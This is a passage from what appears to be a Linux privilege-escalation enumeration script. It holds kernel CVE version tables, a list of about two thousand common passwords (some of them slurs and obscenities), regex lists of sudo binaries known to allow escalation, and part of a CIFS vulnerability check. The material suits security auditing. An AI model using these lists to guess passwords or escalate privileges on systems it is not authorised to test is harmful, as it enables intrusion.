   1802 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=6.2,ver<6.6.139,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 6.6.139; mitigated by kernel.yama.ptrace_scope >= 2
   1803 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=6.7,ver<6.12.89,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 6.12.89; mitigated by kernel.yama.ptrace_scope >= 2
   1804 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=6.13,ver<6.18.31,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 6.18.31; mitigated by kernel.yama.ptrace_scope >= 2
   1805 CVE-2026-46333	ptrace exit-race	pkg=linux-kernel,ver>=6.19,ver<7.0.8,cmd:[ "$(cat /proc/sys/kernel/yama/ptrace_scope 2>/dev/null || echo 0)" -lt 2 ]		1	Upstream issue introduced in 4.10; fixed in 7.0.8; mitigated by kernel.yama.ptrace_scope >= 2
   1806 EOF_DATA_22
   1807 )"
   1808 KERNEL_CVE_DATA_23="$(cat <<'EOF_DATA_23'
   1809 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=2.6.39,ver<5.10.261,CONFIG_FUTEX_PI=y		1	Fixed in stable 5.10.261; priority-inheritance futexes must be enabled
   1810 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=5.11,ver<5.15.212,CONFIG_FUTEX_PI=y		1	Fixed in stable 5.15.212; priority-inheritance futexes must be enabled
   1811 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=5.16,ver<6.1.175,CONFIG_FUTEX_PI=y		1	Fixed in stable 6.1.175; priority-inheritance futexes must be enabled
   1812 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=6.2,ver<6.6.140,CONFIG_FUTEX_PI=y		1	Fixed in stable 6.6.140; priority-inheritance futexes must be enabled
   1813 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=6.7,ver<6.12.86,CONFIG_FUTEX_PI=y		1	Fixed in stable 6.12.86; priority-inheritance futexes must be enabled
   1814 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=6.13,ver<6.18.27,CONFIG_FUTEX_PI=y		1	Fixed in stable 6.18.27; priority-inheritance futexes must be enabled
   1815 CVE-2026-43499	GhostLock rtmutex UAF	pkg=linux-kernel,ver>=6.19,ver<7.0.4,CONFIG_FUTEX_PI=y		1	Fixed in stable 7.0.4 and mainline 7.1; priority-inheritance futexes must be enabled
   1816 CVE-2026-53362	IPv6 fraggap out-of-bounds write	pkg=linux-kernel,ver>=6.0,ver<6.1.177,CONFIG_IPV6=[my]		1	Fixed in stable 6.1.177; IPv6 must be enabled
   1817 CVE-2026-53362	IPv6 fraggap out-of-bounds write	pkg=linux-kernel,ver>=6.2,ver<6.6.144,CONFIG_IPV6=[my]		1	Fixed in stable 6.6.144; IPv6 must be enabled
   1818 CVE-2026-53362	IPv6 fraggap out-of-bounds write	pkg=linux-kernel,ver>=6.7,ver<6.12.95,CONFIG_IPV6=[my]		1	Fixed in stable 6.12.95; IPv6 must be enabled
   1819 CVE-2026-53362	IPv6 fraggap out-of-bounds write	pkg=linux-kernel,ver>=6.13,ver<6.18.38,CONFIG_IPV6=[my]		1	Fixed in stable 6.18.38; IPv6 must be enabled
   1820 CVE-2026-53362	IPv6 fraggap out-of-bounds write	pkg=linux-kernel,ver>=6.19,ver<7.1.3,CONFIG_IPV6=[my]		1	Fixed in stable 7.1.3 and mainline 7.2-rc1; IPv6 must be enabled
   1821 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=4.11,ver<5.15.212,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 5.15.212; requires an XFS filesystem with reflink enabled
   1822 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=5.16,ver<6.1.178,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 6.1.178; requires an XFS filesystem with reflink enabled
   1823 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=6.2,ver<6.6.145,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 6.6.145; requires an XFS filesystem with reflink enabled
   1824 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=6.7,ver<6.12.96,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 6.12.96; requires an XFS filesystem with reflink enabled
   1825 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=6.13,ver<6.18.39,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 6.18.39; requires an XFS filesystem with reflink enabled
   1826 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=6.19,ver<7.1.4,CONFIG_XFS_FS=[my],cmd:grep -qw xfs /proc/mounts		1	Fixed in stable 7.1.4; requires an XFS filesystem with reflink enabled
   1827 CVE-2026-64600	RefluXFS stale mapping race	pkg=linux-kernel,ver>=7.2,ver<7.3,CONFIG_XFS_FS=[my],cmd:uname -r 2>/dev/null | grep -Eq '^7\.2\.0-rc[123]([-.]|$)',cmd:grep -qw xfs /proc/mounts		1	Fixed in mainline 7.2-rc4; requires an XFS filesystem with reflink enabled
   1828 EOF_DATA_23
   1829 )"
   1830 
   1831 TIP_DOCKER_ROOTLESS="In rootless mode privilege escalation to root will not be possible."
   1832 
   1833 GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion"
   1834 
   1835 GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig"
   1836 
   1837 top2000pwds="123456 password 123456789 12345678 12345 qwerty 123123 111111 abc123 1234567 dragon 1q2w3e4r sunshine 654321 master 1234 football 1234567890 000000 computer 666666 superman michael internet iloveyou daniel 1qaz2wsx monkey shadow jessica letmein baseball whatever princess abcd1234 123321 starwars 121212 thomas zxcvbnm trustno1 killer welcome jordan aaaaaa 123qwe freedom password1 charlie batman jennifer 7777777 michelle diamond oliver mercedes benjamin 11111111 snoopy samantha victoria matrix george alexander secret cookie asdfgh 987654321 123abc orange fuckyou asdf1234 pepper hunter silver joshua banana 1q2w3e chelsea 1234qwer summer qwertyuiop phoenix andrew q1w2e3r4 elephant rainbow mustang merlin london garfield robert chocolate 112233 samsung qazwsx matthew buster jonathan ginger flower 555555 test caroline amanda maverick midnight martin junior 88888888 anthony jasmine creative patrick mickey 123 qwerty123 cocacola chicken passw0rd forever william nicole hello yellow nirvana justin friends cheese tigger mother liverpool blink182 asdfghjkl andrea spider scooter richard soccer rachel purple morgan melissa jackson arsenal 222222 qwe123 gabriel ferrari jasper danielle bandit angela scorpion prince maggie austin veronica nicholas monster dexter carlos thunder success hannah ashley 131313 stella brandon pokemon joseph asdfasdf 999999 metallica december chester taylor sophie samuel rabbit crystal barney xxxxxx steven ranger patricia christian asshole spiderman sandra hockey angels security parker heather 888888 victor harley 333333 system slipknot november jordan23 canada tennis qwertyui casper gemini asd123 winter hammer cooper america albert 777777 winner charles butterfly swordfish popcorn penguin dolphin carolina access 987654 hardcore corvette apples 12341234 sabrina remember qwer1234 edward dennis cherry sparky natasha arthur vanessa marina leonardo johnny dallas antonio winston \
   1838 snickers olivia nothing iceman destiny coffee apollo 696969 windows williams school madison dakota angelina anderson 159753 1111 yamaha trinity rebecca nathan guitar compaq 123123123 toyota shannon playboy peanut pakistan diablo abcdef maxwell golden asdasd 123654 murphy monica marlboro kimberly gateway bailey 00000000 snowball scooby nikita falcon august test123 sebastian panther love johnson godzilla genesis brandy adidas zxcvbn wizard porsche online hello123 fuckoff eagles champion bubbles boston smokey precious mercury lauren einstein cricket cameron angel admin napoleon mountain lovely friend flowers dolphins david chicago sierra knight yankees wilson warrior simple nelson muffin charlotte calvin spencer newyork florida fernando claudia basketball barcelona 87654321 willow stupid samson police paradise motorola manager jaguar jackie family doctor bullshit brooklyn tigers stephanie slayer peaches miller heaven elizabeth bulldog animal 789456 scorpio rosebud qwerty12 franklin claire american vincent testing pumpkin platinum louise kitten general united turtle marine icecream hacker darkness cristina colorado boomer alexandra steelers serenity please montana mitchell marcus lollipop jessie happy cowboy 102030 marshall jupiter jeremy gibson fucker barbara adrian 1qazxsw2 12344321 11111 startrek fishing digital christine business abcdefg nintendo genius 12qwaszx walker q1w2e3 player legend carmen booboo tomcat ronaldo people pamela marvin jackass google fender asdfghjk Password 1q2w3e4r5t zaq12wsx scotland phantom hercules fluffy explorer alexis walter trouble tester qwerty1 melanie manchester gordon firebird engineer azerty 147258 virginia tiger simpsons passion lakers james angelica 55555 vampire tiffany september private maximus loveme isabelle isabella eclipse dreamer changeme cassie badboy 123456a stanley sniper rocket passport pandora justice infinity cookies barbie xavier unicorn superstar \
   1839 stephen rangers orlando money domino courtney viking tucker travis scarface pavilion nicolas natalie gandalf freddy donald captain abcdefgh a1b2c3d4 speedy peter nissan loveyou harrison friday francis dancer 159357 101010 spitfire saturn nemesis little dreams catherine brother birthday 1111111 wolverine victory student france fantasy enigma copper bonnie teresa mexico guinness georgia california sweety logitech julian hotdog emmanuel butter beatles 11223344 tristan sydney spirit october mozart lolita ireland goldfish eminem douglas cowboys control cheyenne alex testtest stargate raiders microsoft diesel debbie danger chance asdf anything aaaaaaaa welcome1 qwert hahaha forest eternity disney denise carter alaska zzzzzz titanic shorty shelby pookie pantera england chris zachary westside tamara password123 pass maryjane lincoln willie teacher pierre michael1 leslie lawrence kristina kawasaki drowssap college blahblah babygirl avatar alicia regina qqqqqq poohbear miranda madonna florence sapphire norman hamilton greenday galaxy frankie black awesome suzuki spring qazwsxedc magnum lovers liberty gregory 232323 twilight timothy swimming super stardust sophia sharon robbie predator penelope michigan margaret jesus hawaii green brittany brenda badger a1b2c3 444444 winnie wesley voodoo skippy shithead redskins qwertyu pussycat houston horses gunner fireball donkey cherokee australia arizona 1234abcd skyline power perfect lovelove kermit kenneth katrina eugene christ thailand support special runner lasvegas jason fuckme butthead blizzard athena abigail 8675309 violet tweety spanky shamrock red123 rascal melody joanna hello1 driver bluebird biteme atlantis arnold apple alison taurus random pirate monitor maria lizard kevin hummer holland buffalo 147258369 007007 valentine roberto potter magnolia juventus indigo indian harvey duncan diamonds daniela christopher bradley bananas warcraft sunset simone renegade \
   1840 redsox philip monday mohammed indiana energy bond007 avalon terminator skipper shopping scotty savannah raymond morris mnbvcxz michele lucky lucifer kingdom karina giovanni cynthia a123456 147852 12121212 wildcats ronald portugal mike helpme froggy dragons cancer bullet beautiful alabama 212121 unknown sunflower sports siemens santiago kathleen hotmail hamster golfer future father enterprise clifford christina camille camaro beauty 55555555 vision tornado something rosemary qweasd patches magic helena denver cracker beaver basket atlanta vacation smiles ricardo pascal newton jeffrey jasmin january honey hollywood holiday gloria element chandler booger angelo allison action 99999999 target snowman miguel marley lorraine howard harmony children celtic beatrice airborne wicked voyager valentin thx1138 thumper samurai moonlight mmmmmm karate kamikaze jamaica emerald bubble brooke zombie strawberry spooky software simpson service sarah racing qazxsw philips oscar minnie lalala ironman goddess extreme empire elaine drummer classic carrie berlin asdfg 22222222 valerie tintin therock sunday skywalker salvador pegasus panthers packers network mission mark legolas lacrosse kitty kelly jester italia hiphop freeman charlie1 cardinal bluemoon bbbbbb bastard alyssa 0123456789 zeppelin tinker surfer smile rockstar operator naruto freddie dragonfly dickhead connor anaconda amsterdam alfred a12345 789456123 77777777 trooper skittles shalom raptor pioneer personal ncc1701 nascar music kristen kingkong global geronimo germany country christmas bernard benson wrestling warren techno sunrise stefan sister savage russell robinson oracle millie maddog lightning kingston kennedy hannibal garcia download dollar darkstar brutus bobby autumn webster vanilla undertaker tinkerbell sweetpea ssssss softball rafael panasonic pa55word keyboard isabel hector fisher dominic darkside cleopatra blue assassin amelia vladimir roland \
   1841 nigger national monique molly matthew1 godfather frank curtis change central cartman brothers boogie archie warriors universe turkey topgun solomon sherry sakura rush2112 qwaszx office mushroom monika marion lorenzo john herman connect chopper burton blondie bitch bigdaddy amber 456789 1a2b3c4d ultimate tequila tanner sweetie scott rocky popeye peterpan packard loverboy leonard jimmy harry griffin design buddha 1 wallace truelove trombone toronto tarzan shirley sammy pebbles natalia marcel malcolm madeline jerome gilbert gangster dingdong catalina buddy blazer billy bianca alejandro 54321 252525 111222 0000 water sucker rooster potato norton lucky1 loving lol123 ladybug kittycat fuck forget flipper fireman digger bonjour baxter audrey aquarius 1111111111 pppppp planet pencil patriots oxford million martha lindsay laura jamesbond ihateyou goober giants garden diana cecilia brazil blessing bishop bigdog airplane Password1 tomtom stingray psycho pickle outlaw number1 mylove maurice madman maddie lester hendrix hellfire happy1 guardian flamingo enter chichi 0987654321 western twister trumpet trixie socrates singer sergio sandman richmond piglet pass123 osiris monkey1 martina justine english electric church castle caesar birdie aurora artist amadeus alberto 246810 whitney thankyou sterling star ronnie pussy printer picasso munchkin morpheus madmax kaiser julius imperial happiness goodluck counter columbia campbell blessed blackjack alpha 999999999 142536 wombat wildcat trevor telephone smiley saints pretty oblivion newcastle mariana janice israel imagine freedom1 detroit deedee darren catfish adriana washington warlock valentina valencia thebest spectrum skater sheila shaggy poiuyt member jessica1 jeremiah jack insane iloveu handsome goldberg gabriela elijah damien daisy buttons blabla bigboy apache anthony1 a1234567 xxxxxxxx toshiba tommy sailor peekaboo motherfucker montreal manuel madrid kramer \
   1842 katherine kangaroo jenny immortal harris hamlet gracie fucking firefly chocolat bentley account 321321 2222 1a2b3c thompson theman strike stacey science running research polaris oklahoma mariposa marie leader julia island idontknow hitman german felipe fatcat fatboy defender applepie annette 010203 watson travel sublime stewart steve squirrel simon sexy pineapple phoebe paris panzer nadine master1 mario kelsey joker hongkong gorilla dinosaur connie bowling bambam babydoll aragorn andreas 456123 151515 wolves wolfgang turner semperfi reaper patience marilyn fletcher drpepper dorothy creation brian bluesky andre yankee wordpass sweet spunky sidney serena preston pauline passwort original nightmare miriam martinez labrador kristin kissme henry gerald garrett flash excalibur discovery dddddd danny collins casino broncos brendan brasil apple123 yvonne wonder window tomato sundance sasha reggie redwings poison mypassword monopoly mariah margarita lionking king football1 director darling bubba biscuit 44444444 wisdom vivian virgin sylvester street stones sprite spike single sherlock sandy rocker robin matt marianne linda lancelot jeanette hobbes fred ferret dodger cotton corona clayton celine cannabis bella andromeda 7654321 4444 werewolf starcraft sampson redrum pyramid prodigy paul michel martini marathon longhorn leopard judith joanne jesus1 inferno holly harold happy123 esther dudley dragon1 darwin clinton celeste catdog brucelee argentina alpine 147852369 wrangler william1 vikings trigger stranger silvia shotgun scarlett scarlet redhead raider qweasdzxc playstation mystery morrison honda february fantasia designer coyote cool bulldogs bernie baby asdfghj angel1 always adam 202020 wanker sullivan stealth skeeter saturday rodney prelude pingpong phillip peewee peanuts peace nugget newport myself mouse memphis lover lancer kristine james1 hobbit halloween fuckyou1 finger fearless dodgers delete cougar \
   1843 charmed cassandra caitlin bismillah believe alice airforce 7777 viper tony theodore sylvia suzanne starfish sparkle server samsam qweqwe public pass1234 neptune marian krishna kkkkkk jungle cinnamon bitches 741852 trojan theresa sweetheart speaker salmon powers pizza overlord michaela meredith masters lindsey history farmer express escape cuddles carson candy buttercup brownie broken abc12345 aardvark Passw0rd 141414 124578 123789 12345678910 00000 universal trinidad tobias thursday surfing stuart stinky standard roller porter pearljam mobile mirage markus loulou jjjjjj herbert grace goldie frosty fighter fatima evelyn eagle desire crimson coconut cheryl beavis anonymous andres africa 134679 whiskey velvet stormy springer soldier ragnarok portland oranges nobody nathalie malibu looking lemonade lavender hitler hearts gotohell gladiator gggggg freckles fashion david1 crusader cosmos commando clover clarence center cadillac brooks bronco bonita babylon archer alexandre 123654789 verbatim umbrella thanks sunny stalker splinter sparrow selena russia roberts register qwert123 penguins panda ncc1701d miracle melvin lonely lexmark kitkat julie graham frances estrella downtown doodle deborah cooler colombia chemistry cactus bridge bollocks beetle anastasia 741852963 69696969 unique sweets station showtime sheena santos rock revolution reading qwerasdf password2 mongoose marlene maiden machine juliet illusion hayden fabian derrick crazy cooldude chipper bomber blonde bigred amazing aliens abracadabra 123qweasd wwwwww treasure timber smith shelly sesame pirates pinkfloyd passwords nature marlin marines linkinpark larissa laptop hotrod gambit elvis education dustin devils damian christy braves baller anarchy white valeria underground strong poopoo monalisa memory lizzie keeper justdoit house homer gerard ericsson emily divine colleen chelsea1 cccccc camera bonbon billie bigfoot badass asterix anna animals \
   1844 andy achilles a1s2d3f4 violin veronika vegeta tyler test1234 teddybear tatiana sporting spartan shelley sharks respect raven pentium papillon nevermind marketing manson madness juliette jericho gabrielle fuckyou2 forgot firewall faith evolution eric eduardo dagger cristian cavalier canadian bruno blowjob blackie beagle admin123 010101 together spongebob snakes sherman reddog reality ramona puppies pedro pacific pa55w0rd omega noodle murray mollie mister halflife franco foster formula1 felix dragonball desiree default chris1 bunny bobcat asdf123 951753 5555 242424 thirteen tattoo stonecold stinger shiloh seattle santana roger roberta rastaman pickles orion mustang1 felicia dracula doggie cucumber cassidy britney brianna blaster belinda apple1 753951 teddy striker stevie soleil snake skateboard sheridan sexsex roxanne redman qqqqqqqq punisher panama paladin none lovelife lights jerry iverson inside hornet holden groovy gretchen grandma gangsta faster eddie chevelle chester1 carrot cannon button administrator a 1212 zxc123 wireless volleyball vietnam twinkle terror sandiego rose pokemon1 picture parrot movies moose mirror milton mayday maestro lollypop katana johanna hunting hudson grizzly gorgeous garbage fish ernest dolores conrad chickens charity casey blueberry blackman blackbird bill beckham battle atlantic wildfire weasel waterloo trance storm singapore shooter rocknroll richie poop pitbull mississippi kisses karen juliana james123 iguana homework highland fire elliot eldorado ducati discover computer1 buddy1 antonia alphabet 159951 123456789a 1123581321 0123456 zaq1xsw2 webmaster vagina unreal university tropical swimmer sugar southpark silence sammie ravens question presario poiuytrewq palmer notebook newman nebraska manutd lucas hermes gators dave dalton cheetah cedric camilla bullseye bridget bingo ashton 123asd yahoo volume valhalla tomorrow starlight scruffy roscoe richard1 positive \
   1845 plymouth pepsi patrick1 paradox milano maxima loser lestat gizmo ghetto faithful emerson elliott dominique doberman dillon criminal crackers converse chrissy casanova blowme attitude"
   1846 
   1847 if [ "$(ps auxwww 2>/dev/null | wc -l 2>/dev/null)" -lt 8 ]; then
   1848   NOUSEPS="1"
   1849 fi
   1850 
   1851 TIMEOUT="$(command -v timeout 2>/dev/null || echo -n '')"
   1852 
   1853 sudoVB1=" \*|env_keep\W*\+=.*LD_PRELOAD|env_keep\W*\+=.*LD_LIBRARY_PATH|env_keep\W*\+=.*BASH_ENV|env_keep\W*\+=.* ENV|env_keep\W*\+=.*PATH|!env_reset|!requiretty|[^a-zA-Z0-9]7z$|[^a-zA-Z0-9]R$|aa-exec$|[^a-zA-Z0-9]ab$|[^a-zA-Z0-9]acr$|alpine$|ansible-playbook$|ansible-test$|aoss$|apache2$|apache2ctl$|apt-get$|aptitude$|[^a-zA-Z0-9]ar$|arch-nspawn$|aria2c$|[^a-zA-Z0-9]arj$|[^a-zA-Z0-9]arp$|[^a-zA-Z0-9]as$|ascii-xfr$|ascii85$|[^a-zA-Z0-9]ash$|aspell$|asterisk$|[^a-zA-Z0-9]at$|atobm$|autoconf$|autoheader$|autoreconf$|[^a-zA-Z0-9]aws$|base32$|base58$|base64$|basenc$|basez$|bash$|bashbug$|batcat$|bbot$|[^a-zA-Z0-9]bc$|bconsole$|[^a-zA-Z0-9]bee$|borg$|bpftrace$|bridge$|bundle$|busctl$|busybox$|byebug$|bzip2$|cabal$|cancel$|capsh$|cargo$|[^a-zA-Z0-9]cat$|cdist$|certbot$|chattr$|check_by_ssh$|check_cups$|check_log$|check_memory$|check_raid$|check_ssl_cert$|check_statusfile$|chmod$|choom$|chown$|chroot$|chrt$|clamscan$|clisp$|cmake$|[^a-zA-Z0-9]cmp$|cobc$|code$|codex$|column$|comm$|composer$|cowsay$|cowthink$|[^a-zA-Z0-9]cp$|cpan$|cpio$|cpulimit$|crash$|crontab$|[^a-zA-Z0-9]csh$|csplit$|csvtool$|[^a-zA-Z0-9]ctr$|cupsfilter$|curl$|[^a-zA-Z0-9]cut$|dash$|date$|[^a-zA-Z0-9]dc$|[^a-zA-Z0-9]dd$|debugfs$|dhclient$|dialog$|diff$|[^a-zA-Z0-9]dig$|distcc$|dmesg$|dmsetup$|[^a-zA-Z0-9]dnf$|dnsmasq$|doas$|docker$|dos2unix$|dosbox$|dotnet$|dpkg$|dstat$|dvips$|easy_install$|easyrsa$|[^a-zA-Z0-9]eb$|[^a-zA-Z0-9]ed$|efax$|egrep$|elvish$|emacs$|enscript$|[^a-zA-Z0-9]env$|[^a-zA-Z0-9]eqn$|espeak$|[^a-zA-Z0-9]ex$|exiftool$|expand$|expect$|facter$|fail2ban-client$|fastfetch$|ffmpeg$|fgrep$|file$|find$|finger$|firejail$|fish$|flock$|[^a-zA-Z0-9]fmt$|fold$|forge$|fping$|[^a-zA-Z0-9]ftp$|[^a-zA-Z0-9]fzf$|gawk$|[^a-zA-Z0-9]gcc$|gcloud$|gcore$|[^a-zA-Z0-9]gdb$|[^a-zA-Z0-9]gem$|genie$|genisoimage$|getent$|[^a-zA-Z0-9]ghc$|ghci$|gimp$|ginsh$|[^a-zA-Z0-9]git$|gnuplot$|[^a-zA-Z0-9]go$|[^a-zA-Z0-9]grc$|grep$|gtester$|guile$|gzip$|hashcat$|head$|hexdump$|[^a-zA-Z0-9]hg$|highlight$|hping3$|iconv$|iftop$|install$|ionice$|[^a-zA-Z0-9]ip$|iptables-save$|[^a-zA-Z0-9]irb$|ispell$|java$|[^a-zA-Z0-9]jjs$|[^a-zA-Z0-9]joe$|join$|journalctl$|[^a-zA-Z0-9]jq$|jrunscript$|jshell$|jtag$|julia$|knife$|ksshell$|[^a-zA-Z0-9]ksu$|kubectl$|last$|latex$|latexmk$|ld.so$|ldconfig$|less$|lftp$|links$|[^a-zA-Z0-9]ln$|loginctl$|logrotate$|logsave$|look$|[^a-zA-Z0-9]lp$|ltrace$|[^a-zA-Z0-9]lua$|lualatex$|luatex$|lwp-download$|lwp-request$|[^a-zA-Z0-9]lxd$|[^a-zA-Z0-9]m4$|mail$|make$|[^a-zA-Z0-9]man$|mawk$|minicom$|more$"
   1854 sudoVB2="mosh-server$|mosquitto$|mount$|msfconsole$|msgattrib$|msgcat$|msgconv$|msgfilter$|msgmerge$|msguniq$|[^a-zA-Z0-9]mtr$|multitime$|mutt$|[^a-zA-Z0-9]mv$|mypy$|mysql$|nano$|nasm$|[^a-zA-Z0-9]nc$|ncdu$|ncftp$|needrestart$|neofetch$|[^a-zA-Z0-9]nft$|nginx$|nice$|[^a-zA-Z0-9]nl$|[^a-zA-Z0-9]nm$|nmap$|node$|nohup$|[^a-zA-Z0-9]npm$|nroff$|nsenter$|ntpdate$|octave$|[^a-zA-Z0-9]od$|opencode$|openssl$|openvpn$|openvt$|opkg$|pandoc$|passwd$|paste$|[^a-zA-Z0-9]pax$|[^a-zA-Z0-9]pdb$|pdflatex$|pdftex$|perf$|perl$|perlbug$|pexec$|[^a-zA-Z0-9]pg$|[^a-zA-Z0-9]php$|[^a-zA-Z0-9]pic$|pidstat$|[^a-zA-Z0-9]pip$|pipx$|pkexec$|[^a-zA-Z0-9]pkg$|plymouth$|podman$|poetry$|posh$|[^a-zA-Z0-9]pr$|procmail$|[^a-zA-Z0-9]pry$|psftp$|psql$|[^a-zA-Z0-9]ptx$|puppet$|pwsh$|pygmentize$|pyright$|python$|qpdf$|rake$|ranger$|[^a-zA-Z0-9]rc$|readelf$|redcarpet$|redis$|restic$|[^a-zA-Z0-9]rev$|rlogin$|rlwrap$|[^a-zA-Z0-9]rpm$|rpmdb$|rpmquery$|rpmverify$|rsync$|rsyslogd$|rtorrent$|ruby$|run-mailcap$|run-parts$|runscript$|rustc$|rustdoc$|rustfmt$|rustup$|sash$|scanmem$|[^a-zA-Z0-9]scp$|screen$|script$|scrot$|[^a-zA-Z0-9]sed$|service$|setarch$|setcap$|setfacl$|setlock$|sftp$|[^a-zA-Z0-9]sg$|shred$|shuf$|slsh$|smbclient$|snap$|socat$|socket$|soelim$|softlimit$|sort$|split$|sqlite3$|sqlmap$|[^a-zA-Z0-9]ss$|[^a-zA-Z0-9]ssh$|ssh-agent$|ssh-copy-id$|ssh-keygen$|ssh-keyscan$|sshfs$|sshpass$|sshuttle$|start-stop-daemon$|stdbuf$|strace$|strings$|[^a-zA-Z0-9]su$|sudo$|sysctl$|systemctl$|systemd-resolve$|systemd-run$|[^a-zA-Z0-9]tac$|tail$|tailscale$|[^a-zA-Z0-9]tar$|task$|taskset$|tasksh$|[^a-zA-Z0-9]tbl$|tclsh$|tcpdump$|tcsh$|tdbtool$|[^a-zA-Z0-9]tee$|telnet$|terraform$|[^a-zA-Z0-9]tex$|tftp$|[^a-zA-Z0-9]tic$|time$|timedatectl$|timeout$|tmate$|tmux$|[^a-zA-Z0-9]top$|torify$|torsocks$|troff$|[^a-zA-Z0-9]tsc$|tshark$|[^a-zA-Z0-9]ul$|unexpand$|uniq$|unshare$|unsquashfs$|unzip$|update-alternatives$|urlget$|uuencode$|[^a-zA-Z0-9]uv$|vagrant$|valgrind$|varnishncsa$|[^a-zA-Z0-9]vi$|vigr$|[^a-zA-Z0-9]vim$|vipw$|virsh$|volatility$|[^a-zA-Z0-9]w3m$|wall$|watch$|[^a-zA-Z0-9]wc$|wg-quick$|wget$|whiptail$|whois$|wireshark$|wish$|xargs$|xdg-user-dir$|xdotool$|xmodmap$|xmore$|xpad$|[^a-zA-Z0-9]xxd$|[^a-zA-Z0-9]xz$|yarn$|yash$|yelp$|yt-dlp$|[^a-zA-Z0-9]yum$|zathura$|zcat$|zgrep$|[^a-zA-Z0-9]zic$|[^a-zA-Z0-9]zip$|zless$|[^a-zA-Z0-9]zsh$|zsoelim$|zypper$"
   1855 
   1856 
   1857 
   1858 
   1859 # Functions
   1860 
   1861 print_info(){
   1862   printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC
   1863 }
   1864 
   1865 cs46243_kernel_is_fixed() {
   1866   cs46243_kernel="${1%%-*}"
   1867   cs46243_major="$(printf '%s' "$cs46243_kernel" | cut -d. -f1)"
   1868   cs46243_minor="$(printf '%s' "$cs46243_kernel" | cut -d. -f2)"
   1869   cs46243_patch="$(printf '%s' "$cs46243_kernel" | cut -d. -f3)"
   1870   case "$cs46243_major:$cs46243_minor:$cs46243_patch" in
   1871     *[!0-9:]*|::*|*:|:*) return 1 ;;
   1872   esac
   1873   [ "$cs46243_major" -gt 7 ] && return 0
   1874   if [ "$cs46243_major" -eq 7 ]; then
   1875     [ "$cs46243_minor" -ge 1 ] && return 0
   1876     [ "$cs46243_minor" -eq 0 ] && [ "$cs46243_patch" -ge 11 ] && return 0
   1877     return 1
   1878   fi
   1879   [ "$cs46243_major" -lt 2 ] && return 0
   1880   if [ "$cs46243_major" -eq 2 ]; then
   1881     [ "$cs46243_minor" -lt 6 ] && return 0
   1882     [ "$cs46243_minor" -eq 6 ] && [ "$cs46243_patch" -lt 24 ] && return 0
   1883     return 1
   1884   fi
   1885   case "$cs46243_major.$cs46243_minor" in
   1886     5.10) [ "$cs46243_patch" -ge 258 ] ;;
   1887     5.15) [ "$cs46243_patch" -ge 209 ] ;;
   1888     6.1) [ "$cs46243_patch" -ge 175 ] ;;
   1889     6.6) [ "$cs46243_patch" -ge 142 ] ;;
   1890     6.12) [ "$cs46243_patch" -ge 92 ] ;;
   1891     6.18) [ "$cs46243_patch" -ge 34 ] ;;
   1892     *) return 1 ;;
   1893   esac
   1894 }
   1895 checkCIFSwitchCVE202646243() {
   1896   [ "$(uname -s 2>/dev/null)" = "Linux" ] || return 0
   1897   cs46243_root="${ROOT_FOLDER:-/}"
   1898   case "$cs46243_root" in
   1899     */) ;;
   1900     *) cs46243_root="${cs46243_root}/" ;;
   1901   esac
   1902   cs46243_modules="${cs46243_root}proc/modules"
   1903   if ! [ -d "${cs46243_root}sys/module/cifs" ]; then
   1904     [ -r "$cs46243_modules" ] && grep -q '^cifs[[:space:]]' "$cs46243_modules" 2>/dev/null || return 0
   1905   fi
   1906   cs46243_config=""
   1907   cs46243_helper=""
   1908   # request-key reads the drop-in directory before the main file.
   1909   for cs46243_config in "${cs46243_root}"etc/request-key.d/*.conf "${cs46243_root}etc/request-key.conf"; do
   1910     [ -r "$cs46243_config" ] || continue
   1911     cs46243_helper="$(awk '$1 == "create" && $2 == "cifs.spnego" && $5 ~ /(^|\/)cifs\.upcall$/ { print $5; exit }' "$cs46243_config" 2>/dev/null)"
   1912     [ "$cs46243_helper" ] && break
   1913   done
   1914   [ "$cs46243_helper" ] || return 0
   1915   case "$cs46243_helper" in
   1916     /*) cs46243_helper_host="${cs46243_root}${cs46243_helper#/}" ;;
   1917     *) cs46243_helper_host="$cs46243_helper" ;;
   1918   esac
   1919   [ -x "$cs46243_helper_host" ] || return 0
   1920   cs46243_request_key="${cs46243_root}sbin/request-key"
   1921   [ -x "$cs46243_request_key" ] || return 0
   1922   cs46243_kallsyms="${cs46243_root}proc/kallsyms"
   1923   if [ -r "$cs46243_kallsyms" ] && grep -q '[[:space:]]cifs_spnego_key_vet_description' "$cs46243_kallsyms" 2>/dev/null; then
   1924     return
   1925   fi
